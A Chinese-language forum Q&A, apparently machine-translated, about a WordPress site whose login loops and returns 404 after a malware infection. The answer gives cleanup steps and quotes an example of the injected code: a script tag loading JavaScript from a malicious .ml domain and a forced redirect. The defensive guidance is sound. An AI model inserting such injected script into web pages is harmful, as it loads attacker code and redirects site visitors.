找不到 wp-login.php 和 wp-admin 404 上的太多重定向

Question

我的 wordpress 网站有问题。我根本无法登录。当我尝试转到 wp-admin 时，出现 404 页面未找到错误，它重定向到 wp-login.php (wp-login.php?redirect_to=https%3A%2F%2Fmycrazywebsite.com%2Fwp-admin%2F&reauth= 1)

当我只转到 wp-login.php 时，我收到一条错误消息，提示您重定向了太多次。

我尝试了以下方法：

清除我的 cookie - 没有用

我在我的数据库中的 wp-options 中检查了我的 siteurl 和 home - 两者都是正确的。

将以下代码添加到 wp-config.php：

define('WP_HOME' , 'https://mycrazywebsite.com'); define('WP_SITEURL' , 'https://mycrazywebsite.com');

删除了我的 .htaccess 文件

将以下代码添加到 wp-config.php

if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) $_SERVER['HTTPS']='on';

他们都没有工作......请帮助我已经为此苦苦挣扎了好几天？如果我用一个新的 wp-admin 替换我的网站会影响我的网站吗？

请注意：

本网站受到传播的temp.lowerbeforwarden.ml病毒的影响。

Answer 1

我想说这不是您的 Apache 配置问题，因为这一切都是在您的网站受到病毒影响之后开始的。

• 创建一个副本wp-config.php并下载它。

• 转到wp-includes目录并查找名为 version.php. 查看您拥有的 WordPress 版本。

• 访问https://wordpress.org/download/releases/并下载该版本的 zip。

• 删除除 wp-content目录之外的所有内容。

• 上传和提取。

• 重命名wp-config-sample.php为wp-config.php. 定义数据库凭据和身份验证密钥（请记住，您保存了 wp-config.php 的旧副本！在需要的地方复制粘贴详细信息，但除非您绝对确定其中没有恶意代码，否则不要上传旧的）

• 转到/wp-content/plugins目录并记下所有已安装的插件。删除所有这些。从 WordPress 存储库中获取所有这些插件并上传 zip 文件并解压缩它们。

• 转到您的 phpMyAdmin 并运行此查询（您的表名可能会有所不同，它应该是 wp_posts 或者可能采用这种格式 wpXX_posts，只需检查一下）：

  select * from wpXX_posts where post_content like '%script%'

• 查看post_content每一行的数据并删除任何恶意 javascript 代码。（从该单元格复制数据，粘贴到文本编辑器中，查看，删除该单元格中的所有内容并放回已查看的数据）

  示例（要查找的类似内容）：

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script> <script type='text/javascript'>window.location.href = "SOME_URL";</script>

此外，查找您未添加的任何 Google Analytics 或跟踪脚本。

• 转到wp-contents > themes并删除所有主题文件夹。上传您的主题的 zip 文件并解压缩并放在那里。

• 现在一切都应该正常了。最后一步，登录您的 WordPress 仪表板，转到并向下settings > permalinks滚动并单击“保存更改”。